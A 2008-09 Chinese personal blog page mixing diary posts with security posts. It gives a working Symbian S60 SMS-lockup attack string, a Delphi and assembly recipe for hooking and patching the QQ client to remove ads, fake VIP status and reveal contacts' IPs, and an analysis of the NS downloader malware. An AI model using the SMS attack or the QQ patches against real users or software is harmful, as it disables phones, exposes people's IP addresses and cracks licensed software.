Herozyf's Blog

Symbian系统短信锁死漏洞攻击与解决，手机也黑客

Sat, 03 Jan 2009 10:39:46 +0000

诺基亚s60短信漏洞是利用了symbian特定版本”短信处理引擎“的一个设计错误而产生的”buffer overflow“，或称”溢出式“攻击，从而达到"DOS" (Deny of Service)的攻击效果。

这个攻击的实际工作原理是：当受害手机收到危害短信后，手机的短信处理模块会试图解析，但是因为模块设计中的缺陷，当遇到这条短信后，手机的短信处理模块会出错，但是这个模块仍然会不停的重试，从而最终导致短信处理模块陷于这个错误，无法继续接受后续其他的正常短信。

危害：
受害手机收到攻击短信后，收不到以后的所有短信，并且看不到攻击短信本身（攻击于无形，受害者压根不知情。由于查短信话单只能查发送的而查不到接收的，所以隐蔽性很高）.使用其他任意手机给中招手机发送短信，将无法送达（发送延缓），重新启动中招手机，问题依旧。

受影响的手机：
采用 Symbain Series 60 的手机，覆盖了诺基亚、三星、索尼等品牌

代表机型：
S60 3rd Edition, Feature Pack 1 (S60 3.1):
Nokia E90 Communicator
Nokia E71
Nokia E66
Nokia E51_（俺用地，汗）
Nokia N95 8GB
Nokia N95
Nokia N82
Nokia N81 8GB
Nokia N81
Nokia N76

Nokia 6290
Nokia 6124 classic
Nokia 6121 classic
Nokia 6120 classic
Nokia 6110 Navigator
Nokia 5700 XpressMusic

S60 3rd Edition, initial release (S60 3.0):
Nokia E70
Nokia E65
Nokia E62
Nokia E61i
Nokia E61
Nokia E60
Nokia E50
Nokia N93i
Nokia N93
Nokia N92
Nokia N91 8GB
Nokia N91
Nokia N80
Nokia N77
Nokia N73
Nokia N71
Nokia 5500
Nokia 3250

S60 2nd Edition, Feature Pack 3 (S60 2.8):
Nokia N90
Nokia N72
Nokia N70

S60 2nd Edition, Feature Pack 2 (S60 2.6):
Nokia 6682
Nokia 6681
Nokia 6680
Nokia 6630

攻击方法（只供研究测试）：
以email格式（诺基亚手机发送短信时可选此选项，未提供该选项的可能需要自行更改相应标志位，值为0x32）发送123456789@123456789.1234567890123  即可。

HappyNewYearANDHappySpringFestival@hello.hi 也行，只要满足xxx@yyy.zzz格式，不少于32个字符，并且以空格结尾就行。

注：对于S60 3.1版本，攻击短信需要发送11次才生效。

通过国外研究者的报告以及我们自己的验证，发现：
1.S60 2.8/3.1系统的诺基亚手机，在收到十余条该短信时会出现“内存不足，请先删除一些短信”类似提示，并且无法收到新短信。
2.其他上述提及系统的诺基亚手机，收到一条该短信后便无法收到新短信，且无任何提示。
鉴于该漏洞的严重危害性，提醒所有使用上述机型的机友：
1.S60 3.1系统的手机，进入短信息收件箱时，出现“内存不足，请删除一些短信”等提示时，很可能已经中招。
2.其他上述提及但非3.1系统的手机，长时间收不到短信息。

解决方案：
检测是否中招：自己给自己发送短信是否收到，或者发送hfcx给10086查余额。

中招的话按*#7370#格式化。格式化会丢失现有内存信息，包括电话本和短信等，记得先备份。

提供个漏洞扫描与专杀工具，安装后请重新启动手机杀毒。
点击这里下载文件

Tags - 手机 , 安全

2009元旦快乐

Thu, 01 Jan 2009 00:48:34 +0000

时光飞逝，岁月荏苒，转眼已告别了2008，迎来了崭新的2009年！

      日历又要翻开新的一页
      春姑娘又向我们款款走来

      新的一年开始了，梳理“行装”，展望未来，心里却有着一种莫名的感动、温暖。在2008年一篇篇的文章里，一行行的文字中，那些个充满温情的画卷，那些个让人追忆的时光，那些个让人感动的留言，那些……
      曾经活跃在2008年的人和事，蒙太奇般的在脑海中闪烁。

      闲暇给朋友们发了短信，收到了不少祝福，包涵着诸多含义。因为时代科技的进步，天涯不在遥远，感觉朋友离的很近很近。我崇尚的朋友之间的感觉是若即若离，好象接近，又好象不接近，其实主要的是没有忘记！现在大家都很忙，或者说疲于奔命，仔细想想朋友的聚会少了，大团圆的日子几乎不可能了。于是朋友间更需要理解了，误解是难免的，其实也是对朋友的考验。
      朋友有远近，当然也有三六九等。人生七十古来稀，大家能见面结识，其实也是修来得缘分呢，还是珍惜吧。郑板桥的“吃亏是福”很是欣赏，自己也早过了不惑之年，对得失已经不大看中了，基本放下了一半。……
      新年没有睡懒觉，起来写了点滴文字。目的是祝福我的朋友们和亲人们，牛年交好运，健康随身，事业顺心，家庭顺义，财运旺旺旺！！！
      最后博主Herozyf祝福支持偶的新老朋友——新年快乐，万事如意，合家团圆，恭喜发财！

Tags - 日记 , 生活

山寨英语,很好很强大！

Sat, 27 Dec 2008 16:35:13 +0000

01．we two who and who？
　　咱俩谁跟谁啊？

02．how are you ? how old are you?
　　怎么是你，怎么老是你？（我认为此最为经典）

03．you don`t bird me,I don`t bird you.
　　你不鸟我，我也不鸟你。

04．you have seed I will give you some color to see see, brothers ！ Together up ！
　　你有种，我要给你点颜色瞧瞧，兄弟们，一起上！

05．hello everybody!if you have something to say,then say!if you have nothing to say,go home!!
　　有事起奏，无事退朝。

06．you me you me.
　　彼此彼此。

07．You Give Me Stop!!
　　你给我站住！

08．know is know noknow is noknow...
　　知之为知之，不知为不知...

09．WATCH SISTER!
　　表妹!

10．dragon born dragon,chicken born chicken,mouse'son can make hole!!
　　龙生龙，凤生凤，老鼠的儿子会打洞！

11．American Chinese not enough.
　　美中不足。（小王子认为此也颇有些想象力。嘿嘿！）

12．one car come one car go ,two car pengpeng,people die.
　　车祸现场描述。

13．heart flower angry open.
　　心花怒放。

14．go past no mistake past.
　　走过路过，不要错过。

15．小明：I am sorry!
　　老外：I am sorry too!
　　小明：I am sorry three!
　　老外：What are you sorry for?
　　小明：I am sorry five！

16．If you want money,I have no, if you want life,I have one!
　　要钱没有，要命一条。

17．I call Li old big. Toyear 25.
　　我叫李老大，今年25。

18．you have two down son。
　　你有两下子。

19．as far as you go to die!!!
　　有多远，死多远！！！

20．I give you face you don`t wanna face,you lose you face ,I turn my　face.
　　给你脸你不要脸，你丢脸，我翻脸。

21. no three no four!
　　不三不四！

22. seven up eight down!
　　七上八下！
Tags - 搞笑 , 生活

QQ去广告+本地会员+显示IP外挂原理

Sat, 13 Dec 2008 12:07:43 +0000

采用自动代码分析,支持QQ2007和QQ2008的全部版本,目前尚未支持采用全新架构的QQ2009
下载 v81003+ IP数据库 81005

[本文针对QQ2007而写]

主要技术原理:

做IPQQ,那么这几个必备工具是不可缺的:OllyDbg,PEExplorer,DASM32,MFCSpy2
QQ是基于接口调用架构的,这为窥探其内部提供了方便之门

0)    经过分析,获知QQ获取IP信息是通过接口调用实现的,其步骤为
IQQCore->IQQData->IQQUserDynData->dwIP方法

1)    获得IQQCore.要获得此全局描述接口的方法有很多,最好的就是通过QQHelperDll.dll的 ?IsLogin@@YAHPAUIQQCore@@@Z方法获得,函数表达为int __cdecl IsLogin (struct IQQCore **).因为这个IsLogIn方法被QQ频繁调用,于是Hook这个函数,便能轻易获得IQQCore了

function IsLogin(pQQCore: Pointer): Integer; cdecl;
begin
  Result := Call original Func;  调用原函数
  pIQQCore := pQQCore;  获得IQQCore
end;

2)    从IQQCore获得IQQData.这个事情好办,QQ的BasicCtrlDll.dll的?GetFriendQQData@@YAHPAUIQQCore@@KPAPAUIQQData@@@Z方法,就是从IQQCore和UIN获得IQQData,函数表达为int __cdecl GetFriendQQData(struct IQQCore *,unsigned long,struct IQQData * *)

asm
      // int __cdecl GetFriendQQData(struct IQQCore *,unsigned long,struct IQQData * *)
      mov eax, pIQQCore
      mov edx, UIN  // QQ Uin (QQ number)
      lea ecx, Result  // return = pIQQData
      push ecx
      push edx
      push eax
      call GetFriendQQData
      add esp, $C  // fix call stack
end;

3)    从IQQData获得IQQUserDynData.很不幸,QQ没有直接提供该方法,只好DASM QQ的内部,来模拟此过程的调用.
const
  szQQUSER_DYNAMIC_DATA : PChar = 'QQUSER_DYNAMIC_DATA';
  clsid_IQQData : TGUID = '{BA863A1E-C979-498A-975C-C501C4F310A3}';
asm
      // pIQQData = Pointer(IQQData);
      mov ecx, pIQQData
      mov ecx, [ecx]  // ecx = IQQData.vtbl
      mov eax, pIQQData  // this pIQQData
      lea edx, Result  // return = pIQQUDD
      push edx
      lea edx, clsid_IQQData  // clsid_IQQData
      push edx
      push szQQUSER_DYNAMIC_DATA
      push eax
      call [ecx + $54]  // IQQData.vf_54h QQUSER_DYNAMIC_DATA proc entry
end;

4)    从IQQUserDynData获得IP信息.
const
  szdwIP : PChar = 'dwIP';
  szwPort : PChar = 'wPort';
asm
      // get Uin info
      mov eax, pIQQUDD
      mov ecx, [eax]
      lea edx, dwIP
      push edx
      push szdwIP
      push eax　　　
     call [ecx + $34]  // IQQUDD.vf_34h
      mov eax, pIQQUDD
      mov ecx, [eax]
      lea edx, wPort
      push edx
      push szwPort
      push eax　　　
      call [ecx + $30]  // IQQUDD.vf_30h
end;

上面的代码,懂ASM的人很容易就能理解的,其实这些代码也是来自QQ的DASM工程.
注意一下接口调用和Cdecl就行了,因为用Delphi写的,所以不好直接支持C++的thiscall,故采用BASM方式来调用~

至于去广告,把目录AD下全部文件和Dat下Ad.gif删除了,广告就不会出来了.
可是这样QQ还是会下载新的广告的,怎么办呢?只好修改QQ内部了,这是属于破解的范畴,做起来也并不复杂.

DASM分析QQ.EXE即可查询到"广告"和"下载逻辑"的文本常量和OD查找字符串常量"Download_Start",它的上面是"SECTION_AD",然后把相关的地方NOP了就能使QQ不再下载广告.不同的版本要修改的地方不一样,这里就仅以QQ2007II Beta1为例

004E9D49  |.  57            push    edi
004E9D4A  |.  50            push    eax
004E9D4B  |.  57            push    edi
004E9D4C  |.  53            push    ebx
004E9D4D  |.  68 EFB14E00   push    004EB1EF                         ;  Entry address
^ 这里是广告下载过程入口,到入口改为retn直接返回就OK了
004E9D52  |.  E8 DE4EF2FF   call    0040EC35
004E9D57  |.  83C4 14       add     esp, 14
004E9D5A  |.  BF 7CF55A00   mov     edi, 005AF57C                    ;  ASCII "C:\config_asam.ini"
004E9D5F  |.  C745 10 60EA0>mov     dword ptr [ebp+10], 0EA60
004E9D66  |.  57            push    edi                              ; /FileName => "C:\config_asam.ini"
004E9D67  |.  FF15 E0035400 call    dword ptr [<&KERNEL32.GetFileAtt>; \GetFileAttributesA
004E9D6D  |.  83F8 FF       cmp     eax, -1
004E9D70  |.  74 64         je      short 004E9DD6
004E9D72  |.  A8 10         test    al, 10
004E9D74  |.  75 60         jnz     short 004E9DD6
004E9D76  |.  57            push    edi
004E9D77  |.  8D4D B8       lea     ecx, dword ptr [ebp-48]
004E9D7A  |.  E8 657BFAFF   call
004E9D7F  |.  BF 84DB5500   mov     edi, 0055DB84
004E9D84  |.  C645 FC 0C    mov     byte ptr [ebp-4], 0C
004E9D88  |.  897D B4       mov     dword ptr [ebp-4C], edi
004E9D8B  |.  B8 70F55A00   mov     eax, 005AF570                    ;  ASCII "SECTION_AD"
004E9D90  |.  C645 FC 0D    mov     byte ptr [ebp-4], 0D
004E9D94  |.  8BC8          mov     ecx, eax
004E9D96  |.  85C9          test    ecx, ecx
004E9D98  |.  74 1A         je      short 004E9DB4
004E9D9A  |.  B9 60F55A00   mov     ecx, 005AF560                    ;  ASCII "Download_Start"
004E9D9F  |.  8BD1          mov     edx, ecx
004E9DA1  |.  85D2          test    edx, edx
004E9DA3  |.  74 0F         je      short 004E9DB4
004E9DA5  |.  FF75 B8       push    dword ptr [ebp-48]               ; /IniFileName
004E9DA8  |.  6A 00         push    0                                ; |Default = 0
004E9DAA  |.  51            push    ecx                              ; |Key => "Download_Start"
004E9DAB  |.  50            push    eax                              ; |Section => "SECTION_AD"
004E9DAC  |.  FF15 3C035400 call    dword ptr [<&KERNEL32.GetPrivate>; \GetPrivateProfileIntA
004E9DB2  |.  EB 02         jmp     short 004E9DB6
004E9DB4  |>  33C0          xor     eax, eax
004E9DB6  |>  85C0          test    eax, eax
004E9DB8  |.  74 09         je      short 004E9DC3
004E9DBA  |.  69C0 E8030000 imul    eax, eax, 3E8
004E9DC0  |.  8945 10       mov     dword ptr [ebp+10], eax
004E9DC3  |>  C645 FC 0B    mov     byte ptr [ebp-4], 0B
004E9DC7  |.  897D B4       mov     dword ptr [ebp-4C], edi
004E9DCA  |.  8D4D B8       lea     ecx, dword ptr [ebp-48]
004E9DCD  |.  C645 FC 0B    mov     byte ptr [ebp-4], 0B
004E9DD1  |.  E8 D679FAFF   call
004E9DD6  |>  68 A0F45A00   push    005AF4A0                         ;  ASCII

"D:\QQ\qqbuilder_QQ2007IIbeta1Proj_int\Basic_QQ_VOB\QQ\QQMainApp\QQCSCenterSubApp.cpp"
004E9DDB  |.  B9 886C5B00   mov     ecx, 005B6C88
004E9DE0  |.  E8 997AFAFF   call
004E9DE5  |.  BF 906C5B00   mov     edi, 005B6C90
004E9DEA  |.  68 40165400   push    00541640
004E9DEF  |.  8BCF          mov     ecx, edi
004E9DF1  |.  C705 8C6C5B00>mov     dword ptr [5B6C8C], 470
004E9DFB  |.  E8 7E7AFAFF   call
004E9E00  |.  8B45 10       mov     eax, dword ptr [ebp+10]
004E9E03  |.  33D2          xor     edx, edx
004E9E05  |.  B9 E8030000   mov     ecx, 3E8
004E9E0A  |.  F7F1          div     ecx
004E9E0C  |.  50            push    eax
004E9E0D  |.  68 40F55A00   push    005AF540
004E9E12  |.  68 38F55A00   push    005AF538                         ;  ASCII "AD|asam"
004E9E17  |.  E8 AE78F1FF   call    004016CA
004E9E1C  |.  83C4 0C       add     esp, 0C
004E9E1F  |.  837D EC 00    cmp     dword ptr [ebp-14], 0
004E9E23  |.  74 17         je      short 004E9E3C
004E9E25  |.  6A FF         push    -1
004E9E27  |.  FF75 EC       push    dword ptr [ebp-14]
004E9E2A  |.  56            push    esi
004E9E2B  |.  FF75 10       push    dword ptr [ebp+10]
004E9E2E  |.  6A 0B         push    0B
004E9E30  |.  E8 ED4CF2FF   call    0040EB22
004E9E35  |.  83C4 14       add     esp, 14
004E9E38  |.  85C0          test    eax, eax
004E9E3A  |.  74 3D         je      short 004E9E79
^ 这里是判断广告是否要下载, 直接JMP就可以跳过广告下载了
004E9E3C  |>  68 A0F45A00   push    005AF4A0                         ;  ASCII

"D:\QQ\qqbuilder_QQ2007IIbeta1Proj_int\Basic_QQ_VOB\QQ\QQMainApp\QQCSCenterSubApp.cpp"
004E9E41  |.  B9 886C5B00   mov     ecx, 005B6C88
004E9E46  |.  E8 337AFAFF   call
004E9E4B  |.  68 40165400   push    00541640
004E9E50  |.  8BCF          mov     ecx, edi
004E9E52  |.  C705 8C6C5B00>mov     dword ptr [5B6C8C], 476
004E9E5C  |.  E8 1D7AFAFF   call
004E9E61  |.  68 18F55A00   push    005AF518
004E9E66  |.  68 38F55A00   push    005AF538                         ;  ASCII "AD|asam"
004E9E6B  |.  E8 5A78F1FF   call    004016CA
004E9E70  |.  59            pop     ecx
004E9E71  |.  59            pop     ecx
004E9E72  |.  8BCB          mov     ecx, ebx
004E9E74  |.  E8 76130000   call    004EB1EF
004E9E79  |>  8B45 EC       mov     eax, dword ptr [ebp-14]
004E9E7C  |.  33FF          xor     edi, edi
004E9E7E  |.  3BC7          cmp     eax, edi
004E9E80  |.  74 09         je      short 004E9E8B

可是广告窗口还是照样存在的,而且点击了仍旧会有响应的.这就靠外挂才好处理的.要找到QQ聊天窗口中任意一个WinControl的Handle就能轻松用代码干掉广告窗口的.

procedure DisableQQAd(Wnd: LongInt);
label DoNext;
var
  h, t: THandle;
  cn: array [0..254] of Char;
  function RemoveAdLabel(hStatic: THandle): Boolean;
  begin
    Result := False;
    GetClassName(hStatic, @cn, SizeOf(cn));
    if cn = 'Static' then  // class name should be "Static"
       if GetWindowText(hStatic, @cn, SizeOf(cn)) > 0 then
          if Trim(cn) <> '' then  // if Static control contain any Text
             begin
               DestroyWindow(hStatic);  // remove it!
               Result := True;
               Exit;
             end;
  end;
begin
  // get root Win control
  while GetParent(Wnd) > 0 do Wnd := GetParent(Wnd);
  // remove QQ Ad url label
  h := GetWindow(Wnd, GW_CHILD or GW_HWNDFIRST);
  while h > 0 do
    begin  // search child controls in chat dialog root
      cn := '';
      // for QQ 2008 final or above
      if RemoveAdLabel(h) then goto DoNext;
      // for QQ 2007 II to 2008 beta
      if cn = '#32770' then  // QQ frame
         begin  // searh child controls in frame control "#32770"
           h := GetWindow(h, GW_CHILD or GW_HWNDFIRST);
           while h > 0 do
             begin
               if RemoveAdLabel(h) then goto DoNext;
               h := GetWindow(h, GW_HWNDNEXT);
             end;
         end;
      h := GetWindow(h, GW_HWNDNEXT);
    end;
  DoNext:
  // remove QQ AD panel
  h := GetWindow(Wnd, GW_CHILD or GW_HWNDFIRST);
  while h > 0 do
    begin
      cn := '';
      GetClassName(h, @cn, SizeOf(cn));
      if cn = '#32770' then  // QQ frame
         begin
           h := GetWindow(h, GW_CHILD or GW_HWNDFIRST);
           while h > 0 do
             begin
               t := GetWindow(h, GW_CHILD or GW_HWNDFIRST);
               if t > 0 then  // has child control
                  begin
                    GetClassName(h, @cn, SizeOf(cn));
                    if cn = 'Static' then  // found!
                       begin
                         DestroyWindow(t);  // destroy Ad window
{ CreateWindow('Static', 'Hello world!!!', // 这里可以做什么?
// 创建一个Form,用SetParent让你的Form附着在上面的,
// 这样可以用你自己的窗口替换QQ的广告栏,TX一定会非常生气的,
// 为了避免麻烦,最好还是不要做此类事情啦.这里只是讨论方法而已.
// 如果要添加自己的Form,那么你还得用SetWindowLong来Hook WndProc过程,
// 以用来处理WM_CLOSE,确保关闭聊天窗口时能释放你的Form.
                           WS_VISIBLE or WS_CHILD or SS_LEFT,
                           0, 0, 242, 36, h, 0, h, nil); }

                         Exit;
                       end;
                  end;
               h := GetWindow(h, GW_HWNDNEXT);
             end;
         end;
      h := GetWindow(h, GW_HWNDNEXT);
    end;
end;

问题是如何找到QQ聊天窗口中的任意个对象的Handle?
方法可以是EnumWindows列举窗口,从标题栏入手,但是这个方法不保险.最好的做法就是
Hook QQBaseClassInDll.dll中的函数,
QQ2007为?SetUin@CAllInOneStatusBar@@QAEX_JH@Z
QQ2007II Beta为?SetUin@CAllInOneStatusBar@@QAEX_JKH@Z
这个函数用于设置QQ聊天窗口中对方号码的信息用的,调用此函数必定传递一个Handle,这个Handle必定在聊天窗口中的,于是一切好办,剩下要注意的就是Delphi不支持thiscall的,所以Hook这个函数必须用assembler方式.
至于Handle在那里,用MFCSpy2分析就知道,在+0x20那里嘛~
另外此函数同时传递对方的QQ号码,也是目前很多在窗口上现实IP显示的外挂所喜欢Hook的函数之一.

到此时,就显IP+去广告上一切OK了,花了俺2天功夫,大功告成!!

顺便公开另外一个去除广告的方法,此方法不必给QQ程序中打硬补丁,而且兼容性更理想,但是QQ广告下载还是必须Nop掉, 不然广告会照样下载而只是不显示而已.
这就是BasicCtrlDll中的?IsVIP@@YAHPAUIQQCore@@@Z其原型为int __cdecl IsVIP(struct IQQCore *)
和QQHelperDll.dll中的?GetSysBoolData@@YAHPBDAAHH@Z.
OD分析QQAllInOne有:

03605EFF    FF15 38506C03   call    dword ptr [<&BasicCtrlDll.IsVIP>] ; BasicCtr.IsVIP
* ^判断当前登陆的QQ是否为VIP,因为VIP用户是可以关闭QQ广告的
03605F05    8365 FC 00      and     dword ptr [ebp-4], 0
03605F09    8BF0            mov     esi, eax
03605F0B    8D45 FC         lea     eax, dword ptr [ebp-4]
03605F0E    6A 01           push    1
03605F10    50              push    eax
03605F11    68 E8A76D03     push    036DA7E8                          ; ASCII "m_bMemberDisableAD"
03605F16    FF15 206D6C03   call    dword ptr [<&QQHelperDll.GetSysBoolData'>; QQHelper.GetSysBoolData
* ^获取广告显示设置
03605F1C    83C4 10         add     esp, 10
03605F1F    85F6            test    esi, esi
03605F21    5E              pop     esi
03605F22    74 0B           je      short 03605F2F
* ^关键!!! 不是VIP就跳的,所以把这个NOP了
03605F24    837D FC 00      cmp     dword ptr [ebp-4], 0
03605F28    74 05           je      short 03605F2F
* ^关键!!! 没关闭AD就跳,所以再把这个NOP了
03605F2A    6A 01           push    1
03605F2C    58              pop     eax
这样,就实现了去AD了

具体可以使直接NOP代码,或者采用Hook方法:
function IsVIP(pQQCore: Pointer): Integer; cdecl;
begin
  Result := 1;
end;

function GetSysBoolData(AText: PChar; p: Pointer; bIsVIP: Boolean): Integer; cdecl;
// int __cdecl GetSysBoolData(char const *,int &,int)
begin
  if AText = 'm_bMemberDisableAD' then
     begin
       Integer(p^) := 1;
       Result := 1;
       Exit;
     end;
  Result := Call original Func;  调用原函数
end;

说到这里,肯定有人会说,如果实现了本地会员,那就不用这么麻烦了嘛?!
显然,这是个捷径,实现起来也不难,关键是找到突破口
经过DASM分析,QQHelperDll是个入手点
用PEExplorer认真查找看看,果然有发现,那就是IsVipUser@qdatCurrentUser@@QAEHXZ
一个无参数函数,Hook了,并让其返回EAX=1,嘿嘿,果然成了本地VIP,这个本地VIP可以享受QQ2007II的涂鸦表情哦~
可是到了这里却仍旧发现QQ的设置上,还是说你是"非会员",不能屏蔽广告,咋办?
显然的是QQQSettingCtrl.dll并没有调用qdatCurrentUser::IsVipUser来判断.那它调用了那个函数呢?
继续努力...N小时后发现!原来是IsQQServiceEnable@@YAHI@Z
这是一个unsigned int入口的函数,估计是服务功能号,由此函数判断当前登录QQ用户可用的服务,于是Hook了,不管三七二十一,一律返回EAX=1,再测试...一切OK!

至此,QQ外挂可告一段落也~~

Tags - 代码 , 原理

记一次还不算太郁闷的网购笔记本

Wed, 03 Dec 2008 13:13:53 +0000

到现在呆的地方以来从来不喜欢逛街买东西，所以导致我买什么都首先想到网络，淘宝。一是因为网络上可买到在当地买不到的东西，比如书了，我想要的书基本在这都找不到，衣服，吃的，用的，手机数码什么的都买过了，好像都还算满意的，当然也不缺乏个人认为很好的，比如前些日子买的枕头，因为睡起来比较舒服，价格也公道，呵呵，当然也有网购的乐趣在了，要说这乐趣在那，自己买着体会吧。
      因为需要要在淘宝买一二手笔记本，虽然大价钱的东西也买过好几次了，但是二手的东西还是第一次，何况还是猫腻最多的电子产品，更是要相当注意了，看了好几天，终于瞅中一台东芝只在日本发售的的本子，跟卖家谈好一切考虑到的问题后拍下付款。四天后在单位收发室拿到货，给领导打声招呼就回房子验货，开箱的结果很令人满意，本子跟描述的一样，几乎是全新的，因为还有令我烦恼的问题，当时也忘了拍了PP，所以现在没的图图给大家看，呵呵。
       检查了下外围和配置方面还算不错，打开机器电源测试，速度很不错，内存硬盘什么的在容量也没什么猫腻，没想到的事情发生了，大约过了有5分钟，机子的速度突然慢了下来，检查了下系统貌似有病毒的样子，好像在当初看买家评论的时候好像也有人说病毒多的问题，于是二话不说重装，驱动先备份了下来，虽然手上的驱动盘还没出现过搞不定的，但是笔记本例外。GHSOT系统无法安装，不能正常出现ghost页面，并且所有光盘版的ghost都无法正常运行，首先想到是刻碟的速度高于光驱支持的速度了，于是刻了张低倍速的，还是不成，最后只好拿出深度的精简版了，那个速度快点。可安装版本的速度也不尽人意，复制文件复制了半天，整个系统我在自己512内存的台式机上15分钟装完的系统在本子上用了接近一个小时，见到此情景我最先想到的是发热问题和硬盘问题，摸了下机子下面确实很热，后来我在下面两边垫了书运行还是那样，最后拿出软件检测硬盘，虽然没检测到坏道但是运行时间是六位数，我在本机用软件检测是四位数，根据我使用的时间软件显示的应该是小时，那这硬盘使用时间也未免太长了吧，一算之下都15年了，晕死，15年之前估计没120G的硬盘吧，后来又用另外一软件查看，但是无法查看到任何信息，但是在我机器上正常检测，检测到的时间跟上个软件是一样的，这下我抛弃了所有的想法，认定是硬盘老化，于是马上联系卖家，告知一切信息后，经过多次的交流，最后尝试卖家给的方法还是不能解决，最后商议退货。
       第二天中午下班就打包装去邮局，没想到邮局人家不让发，可来的时候都是EMS，草了，不知道这的这帮SB什么原因。小地方就这样，一个个的狗仗人势，什么鼓点都出，最烦这个了，NND。无奈只好又联系卖家更换硬盘，最后一算时间太长只好商议我发硬盘过去，他们退我300买块硬盘自己装，一个是我没确认，另外一个是卖家也确实不错，最后成功。第二天周末，一早就坐车去兰州，因为电脑是要送去兰州的，所以直接去那换了，那货源充足。

      进去先打听了下硬盘的行情，后来看到一专业修笔记本的，索性拿去那让他们换吧，省的我动手了，拿上去人家一检测不是硬盘问题，原来是出风口堵上了，散热不正常导致的，NND，看我这脑子，让那软件的误报信息给闹得，谁知道人家一电脑的时间是小时制，一电脑的是秒制，靠，想到退款协议已经商定，索性换新的算了，没想到市场上没有120G的并口硬盘，大的不划算了，本身就是二手机子，就没换，最后花了50大洋搞定，搞完后测试机子半小时后没发现任何问题，把电脑送到算完工了，因为第二天又是必须赶回来，当天晚上10点的火车又赶了回来，累死了，看这一天闹得。

      当然第二天没忘记拍了修机发票让卖家给我报销，呵呵，卖家见硬盘不退了，看到发票二话没说退了我50，交易结束。虽然还不算太郁闷，但是这样的事以后不想再弄了，烦
Tags - 日记 , 生活

NS下载器即将超越机器狗

Sun, 30 Nov 2008 06:34:30 +0000

这是一个结合了机器狗，AV终结者和利用MS08067漏洞攻击的复合型下载者病毒。近几天非常流行，并且预计该病毒在近期会成泛滥之势，希望大家注意！

这个NS下载器继承了机器狗病毒穿还原卡的功能；利用ARP攻击在局域网传播；同时，病毒还有扫荡波的特点，攻击没有修补08-067号漏洞的windows系统。当然利用U盘自动运行功能传播，已经差不多成为病毒的标配。

以下是该病毒的某一变种的分析：

1.病毒运行后，会调用检测是否有调试器存在
并遍历是否存在ImportREC.exe，C32Asm.exe，LordPE.exe，PEditor.exe，OllyICE.exe，OllyDbg.exe等进程，如果是则自身退出。

2.停止如下服务Application Management，Task Scheduler，System Restore Service，Windows Image Acquisition (WIA)，Windows Time

3.之后生成如下文件：
%temp%\dll???.dll(???为随机数字)

4..Dll??.dll注入到svchost.exe中，并创建远程线程。(之前会获得系统时间，如果系统年份大于2008则不注入svchost.exe)
Dll??.dll注入svchost.exe后有如下行为：

(1)创建一个事件NSDownLoader20Vip02。

(2)创建多个线程执行不同的操作

a.读取一个txt格式的下载列表（本例为http://tk123.********.cn/pk/tk123.txt），将木马和病毒下载到%temp%文件夹。

b.映像劫持如下进程pccguide.exe,ZONEALARM.exe,zonealarm.exe,wink.exe,windows优化大师.exe,WFINDV32.exe,webtrap.exe,WEBSCANX.exe,WEBSCAN.exe,vsstat.exe,VSSCAN40,VSHWIN32.exe
,vshwin32.exe
,VSECOMR.exe
,VPC32.exe
,vir.exe
,VETTRAY.exe
,VET95.exe
,vavrunr.exe
,UlibCfg.exe
,TSC.exe
,tmupdito.exe
,tmproxy.exe
,TMOAgent.exe
,Tmntsrv.exe
,TDS2-NT.exe
,TDS2-98.exe
,TCA.exe
,TBSCAN.exe
,symproxysvc.exe
,SWEEP95.exe
,spy.exe
,SPHINX.exe
,smtpsvc.exe
,SMC.exe
,sirc32.exe
,SERV95.exe
,secu.exe
,SCRSCAN.exe
,scon.exe
,SCANPM.exe
,SCAN32.exe
,scan.exe
,scam32.exe
,safeweb.exe
,safeboxTray.exe
,rn.exe
,Rfw.exe
,rescue32.exe
,regedit.exe
,RavTask.exe
,RavStub.exe
,RavMonD.exe
,RavMon.exe
,rav7win.exe
,RAV7.exe
,ras.exe
,pview95.exe
,prot.exe
,program.exe
,PpPpWallRun.exe
,pop3trap.exe
,PERSFW.exe
,PCFWALLICON.exe
,pccwin98.exe
,pccmain.exe
,pcciomon.exe
,PCCClient.exe
,pcc.exe
,PAVCL.exe
,PADMIN.exe
,OUTPOST.exe
,office.exe
,NVC95.exe
,NUPGRADE.exe
,norton.exe
,NORMIST.exe
,NMAIN.exe
,nisum.exe
,nisserv.exe
,NAVWNT.exe
,navwnt.exe
,NAVW32.exe
,NAVW.exe
,NAVSCHED.exe
,navrunr.exe
,NAVNT.exe
,NAVLU32.exe
,navapw32.exe
,navapsvc.exe
,N32ACAN.exe
,ms.exe
,MPFTRAY.exe
,MOOLIVE.exe
,moniker.exe
,mon.exe
,microsoft.exe
,mcafee.exe
,LUCOMSERVER.exe
,luall.exe
,LOOKOUT.exe
,lockdown2000.exe
,lamapp.exe
,kwatch.exe
,KVPreScan.exe
,KVMonXP.exe
,KRF.exe
,KPPMain.exe
,kpfwsvc.exe
,kpfw32.exe
,KPFW32.exe
,kissvc.exe
,kavstart.exe
,kav32.exe
,Kasmain.exe
,Kabackreport.exe
,JED.exe
,iomon98.exe
,iom.exe
,ICSSUPPNT.exe
,ICMOON.exe
,ICLOADNT.exe
,ICLOAD95.exe
,IceSword.exe
,ice.exe...
,指向svchost.exe

c.在%SystemRoot%\system32\目录下生成Nskhelper2.sys恢复SSDT并结束某些杀毒软件进程。

d.释放与机器狗功能类似的驱动NSPASS?.sys(?代表数字)，直接访问磁盘并替换如下dll文件
%SystemRoot%\system32\schedsvc.dll
%SystemRoot%\System32\appmgmts.dll
%SystemRoot%\System32\srsvc.dll
%SystemRoot%\System32\w32time.dll
%SystemRoot%\system32\wiaservc.dll
%SystemRoot%\system32\schedsvc.dll
替换为病毒的dll。

e.每隔15分钟启动一次本机的lanmanserver与Browser服务，扫描本网段内的其他机器，打开对方的4444端口。在本机临时文件夹内创建一个???????.txt的文件（?代表随机数字），并写入一些代码，利用批处理和debug将其“重组”成dll文件，利用rundll32.exe加载，并利用MS08-067漏洞攻击其他机器，同时将该病毒文件复制过去。

f.释放appwinproc.dll到系统目录，设置窗口挂钩，查找带有如下字样的窗口“金山毒霸，360安全卫士, 江民, 木马, 专杀,下载者，NOD32，卡巴斯基…”，找到后调用TerminateProcess函数结束相应进程。

g.修改hosts文件屏蔽常见安全网站
127.0.0.1 www.360.cn
127.0.0.1 www.360safe.cn
127.0.0.1 www.360safe.com
127.0.0.1 www.chinakv.com
127.0.0.1 www.rising.com.cn
127.0.0.1 rising.com.cn
127.0.0.1 dl.jiangmin.com
127.0.0.1 jiangmin.com
127.0.0.1 www.jiangmin.com
127.0.0.1 www.duba.net
127.0.0.1 www.eset.com.cn
127.0.0.1 www.nod32.com
127.0.0.1 shadu.duba.net
